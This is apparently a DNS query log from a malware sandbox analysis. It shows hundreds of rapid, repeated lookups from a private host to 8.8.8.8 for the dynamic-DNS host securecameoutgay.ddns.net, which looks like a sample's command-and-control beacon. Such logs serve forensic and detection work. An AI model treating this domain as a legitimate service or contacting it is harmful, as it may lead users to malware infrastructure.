                                                    Oct 12, 2024 23:05:43.205432892 CEST192.168.2.148.8.8.80x9257Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.214656115 CEST192.168.2.148.8.8.80xa84bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.225790024 CEST192.168.2.148.8.8.80xa84bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.232522011 CEST192.168.2.148.8.8.80xa84bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.240525961 CEST192.168.2.148.8.8.80xa84bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.247993946 CEST192.168.2.148.8.8.80xa84bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.255662918 CEST192.168.2.148.8.8.80xc348Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.262675047 CEST192.168.2.148.8.8.80xc348Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.269709110 CEST192.168.2.148.8.8.80xc348Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.276648998 CEST192.168.2.148.8.8.80xc348Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.283128023 CEST192.168.2.148.8.8.80xc348Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.290327072 CEST192.168.2.148.8.8.80x4e69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.296766043 CEST192.168.2.148.8.8.80x4e69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.303416014 CEST192.168.2.148.8.8.80x4e69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.309923887 CEST192.168.2.148.8.8.80x4e69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.316942930 CEST192.168.2.148.8.8.80x4e69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.323731899 CEST192.168.2.148.8.8.80x9466Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.330368996 CEST192.168.2.148.8.8.80x9466Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.336853981 CEST192.168.2.148.8.8.80x9466Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.343485117 CEST192.168.2.148.8.8.80x9466Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.350074053 CEST192.168.2.148.8.8.80x9466Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.356695890 CEST192.168.2.148.8.8.80x9ed6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.363441944 CEST192.168.2.148.8.8.80x9ed6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.370065928 CEST192.168.2.148.8.8.80x9ed6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.376807928 CEST192.168.2.148.8.8.80x9ed6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.383132935 CEST192.168.2.148.8.8.80x9ed6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.389931917 CEST192.168.2.148.8.8.80xd22eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.396441936 CEST192.168.2.148.8.8.80xd22eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.403215885 CEST192.168.2.148.8.8.80xd22eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.410094976 CEST192.168.2.148.8.8.80xd22eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.417006016 CEST192.168.2.148.8.8.80xd22eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.423875093 CEST192.168.2.148.8.8.80x9314Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.430864096 CEST192.168.2.148.8.8.80x9314Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.438450098 CEST192.168.2.148.8.8.80x9314Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.445668936 CEST192.168.2.148.8.8.80x9314Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.454072952 CEST192.168.2.148.8.8.80x9314Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.461779118 CEST192.168.2.148.8.8.80xe472Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.468390942 CEST192.168.2.148.8.8.80xe472Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.475918055 CEST192.168.2.148.8.8.80xe472Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.482605934 CEST192.168.2.148.8.8.80xe472Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.489267111 CEST192.168.2.148.8.8.80xe472Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.496438026 CEST192.168.2.148.8.8.80x147cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.503381968 CEST192.168.2.148.8.8.80x147cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.510078907 CEST192.168.2.148.8.8.80x147cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.517071962 CEST192.168.2.148.8.8.80x147cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.524949074 CEST192.168.2.148.8.8.80x147cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.534297943 CEST192.168.2.148.8.8.80x25bfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.542231083 CEST192.168.2.148.8.8.80x25bfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.548733950 CEST192.168.2.148.8.8.80x25bfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.555614948 CEST192.168.2.148.8.8.80x25bfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.562786102 CEST192.168.2.148.8.8.80x25bfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.569688082 CEST192.168.2.148.8.8.80x8462Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.577120066 CEST192.168.2.148.8.8.80x8462Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.585351944 CEST192.168.2.148.8.8.80x8462Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.593607903 CEST192.168.2.148.8.8.80x8462Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.600146055 CEST192.168.2.148.8.8.80x8462Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.607237101 CEST192.168.2.148.8.8.80x6c24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.614250898 CEST192.168.2.148.8.8.80x6c24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.621186972 CEST192.168.2.148.8.8.80x6c24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.627880096 CEST192.168.2.148.8.8.80x6c24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.635529041 CEST192.168.2.148.8.8.80x6c24Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.642379999 CEST192.168.2.148.8.8.80x27afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.649015903 CEST192.168.2.148.8.8.80x27afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.656193972 CEST192.168.2.148.8.8.80x27afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.663218975 CEST192.168.2.148.8.8.80x27afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.669680119 CEST192.168.2.148.8.8.80x27afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.676457882 CEST192.168.2.148.8.8.80x6a69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.683310032 CEST192.168.2.148.8.8.80x6a69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.690263033 CEST192.168.2.148.8.8.80x6a69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.697122097 CEST192.168.2.148.8.8.80x6a69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.703931093 CEST192.168.2.148.8.8.80x6a69Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.711184025 CEST192.168.2.148.8.8.80x88edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.717797041 CEST192.168.2.148.8.8.80x88edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.724893093 CEST192.168.2.148.8.8.80x88edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.732002974 CEST192.168.2.148.8.8.80x88edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.739362001 CEST192.168.2.148.8.8.80x88edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.746285915 CEST192.168.2.148.8.8.80x50c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.753453970 CEST192.168.2.148.8.8.80x50c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.760678053 CEST192.168.2.148.8.8.80x50c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.767153978 CEST192.168.2.148.8.8.80x50c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.773741007 CEST192.168.2.148.8.8.80x50c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.780889034 CEST192.168.2.148.8.8.80x38fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.787542105 CEST192.168.2.148.8.8.80x38fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.794249058 CEST192.168.2.148.8.8.80x38fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.801470995 CEST192.168.2.148.8.8.80x38fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.808574915 CEST192.168.2.148.8.8.80x38fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.815232038 CEST192.168.2.148.8.8.80x396dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.822545052 CEST192.168.2.148.8.8.80x396dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.829236984 CEST192.168.2.148.8.8.80x396dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.836160898 CEST192.168.2.148.8.8.80x396dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.843341112 CEST192.168.2.148.8.8.80x396dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.850054026 CEST192.168.2.148.8.8.80x795bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.857830048 CEST192.168.2.148.8.8.80x795bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.864934921 CEST192.168.2.148.8.8.80x795bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.871769905 CEST192.168.2.148.8.8.80x795bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.878355980 CEST192.168.2.148.8.8.80x795bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.885077953 CEST192.168.2.148.8.8.80x831dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.892106056 CEST192.168.2.148.8.8.80x831dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.899014950 CEST192.168.2.148.8.8.80x831dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.906131983 CEST192.168.2.148.8.8.80x831dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.913239956 CEST192.168.2.148.8.8.80x831dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.919698000 CEST192.168.2.148.8.8.80xf301Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.926651955 CEST192.168.2.148.8.8.80xf301Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.933608055 CEST192.168.2.148.8.8.80xf301Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.940206051 CEST192.168.2.148.8.8.80xf301Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.946805954 CEST192.168.2.148.8.8.80xf301Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.954884052 CEST192.168.2.148.8.8.80x9365Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.961879969 CEST192.168.2.148.8.8.80x9365Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.969026089 CEST192.168.2.148.8.8.80x9365Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.976142883 CEST192.168.2.148.8.8.80x9365Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.983061075 CEST192.168.2.148.8.8.80x9365Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.989989996 CEST192.168.2.148.8.8.80x706fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:43.996592045 CEST192.168.2.148.8.8.80x706fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.003688097 CEST192.168.2.148.8.8.80x706fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.010993004 CEST192.168.2.148.8.8.80x706fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.018790007 CEST192.168.2.148.8.8.80x706fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.025755882 CEST192.168.2.148.8.8.80xec38Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.032356024 CEST192.168.2.148.8.8.80xec38Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.039005041 CEST192.168.2.148.8.8.80xec38Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.045629978 CEST192.168.2.148.8.8.80xec38Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.052381039 CEST192.168.2.148.8.8.80xec38Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.059463978 CEST192.168.2.148.8.8.80x74d4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.066029072 CEST192.168.2.148.8.8.80x74d4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.073292971 CEST192.168.2.148.8.8.80x74d4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.080297947 CEST192.168.2.148.8.8.80x74d4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.088972092 CEST192.168.2.148.8.8.80x74d4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.097119093 CEST192.168.2.148.8.8.80xb842Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.103724957 CEST192.168.2.148.8.8.80xb842Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.110647917 CEST192.168.2.148.8.8.80xb842Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.117486000 CEST192.168.2.148.8.8.80xb842Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.124182940 CEST192.168.2.148.8.8.80xb842Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.131202936 CEST192.168.2.148.8.8.80x9ea6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.138051033 CEST192.168.2.148.8.8.80x9ea6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.144788980 CEST192.168.2.148.8.8.80x9ea6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.152149916 CEST192.168.2.148.8.8.80x9ea6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.159224987 CEST192.168.2.148.8.8.80x9ea6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.169126034 CEST192.168.2.148.8.8.80x1deeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.179582119 CEST192.168.2.148.8.8.80x1deeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.189821005 CEST192.168.2.148.8.8.80x1deeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.199037075 CEST192.168.2.148.8.8.80x1deeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.207076073 CEST192.168.2.148.8.8.80x1deeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.215656996 CEST192.168.2.148.8.8.80xd261Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.222805977 CEST192.168.2.148.8.8.80xd261Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.230288982 CEST192.168.2.148.8.8.80xd261Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.237406969 CEST192.168.2.148.8.8.80xd261Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.244769096 CEST192.168.2.148.8.8.80xd261Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.253823042 CEST192.168.2.148.8.8.80x3c13Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.262240887 CEST192.168.2.148.8.8.80x3c13Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.268925905 CEST192.168.2.148.8.8.80x3c13Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.275846958 CEST192.168.2.148.8.8.80x3c13Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.282926083 CEST192.168.2.148.8.8.80x3c13Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.289659977 CEST192.168.2.148.8.8.80xda67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.297055006 CEST192.168.2.148.8.8.80xda67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.304270983 CEST192.168.2.148.8.8.80xda67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.310869932 CEST192.168.2.148.8.8.80xda67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.317452908 CEST192.168.2.148.8.8.80xda67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.324733019 CEST192.168.2.148.8.8.80x72adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.332313061 CEST192.168.2.148.8.8.80x72adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.339193106 CEST192.168.2.148.8.8.80x72adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.346739054 CEST192.168.2.148.8.8.80x72adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.353498936 CEST192.168.2.148.8.8.80x72adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.360188007 CEST192.168.2.148.8.8.80xb9daStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.367077112 CEST192.168.2.148.8.8.80xb9daStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.374408007 CEST192.168.2.148.8.8.80xb9daStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.381844997 CEST192.168.2.148.8.8.80xb9daStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.388612032 CEST192.168.2.148.8.8.80xb9daStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.395503044 CEST192.168.2.148.8.8.80xbe34Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.402364016 CEST192.168.2.148.8.8.80xbe34Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.409786940 CEST192.168.2.148.8.8.80xbe34Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.419085979 CEST192.168.2.148.8.8.80xbe34Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.425746918 CEST192.168.2.148.8.8.80xbe34Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.432398081 CEST192.168.2.148.8.8.80xaa56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.439156055 CEST192.168.2.148.8.8.80xaa56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.445914030 CEST192.168.2.148.8.8.80xaa56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.452744961 CEST192.168.2.148.8.8.80xaa56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.459464073 CEST192.168.2.148.8.8.80xaa56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.466568947 CEST192.168.2.148.8.8.80xec23Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.473093033 CEST192.168.2.148.8.8.80xec23Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.479626894 CEST192.168.2.148.8.8.80xec23Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.486433983 CEST192.168.2.148.8.8.80xec23Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.493480921 CEST192.168.2.148.8.8.80xec23Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.500442982 CEST192.168.2.148.8.8.80x9818Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.507368088 CEST192.168.2.148.8.8.80x9818Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.514139891 CEST192.168.2.148.8.8.80x9818Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.520864010 CEST192.168.2.148.8.8.80x9818Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.528182983 CEST192.168.2.148.8.8.80x9818Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.535463095 CEST192.168.2.148.8.8.80x674dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:44.542078018 CEST192.168.2.148.8.8.80x674dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
